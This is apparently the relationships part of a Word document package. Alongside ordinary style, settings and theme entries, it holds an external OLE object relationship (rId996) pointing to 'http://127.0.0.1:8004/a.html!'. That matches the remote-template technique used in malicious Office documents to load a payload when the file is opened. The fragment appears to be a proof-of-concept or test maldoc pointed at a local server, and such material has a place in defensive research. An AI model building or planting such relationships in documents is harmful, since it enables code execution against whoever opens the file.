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
    <Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml" />
    <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml" />
    <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml" />
    <Relationship Id="rId996" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="http://127.0.0.1:8004/a.html!" TargetMode="External" />
    <Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml" />
  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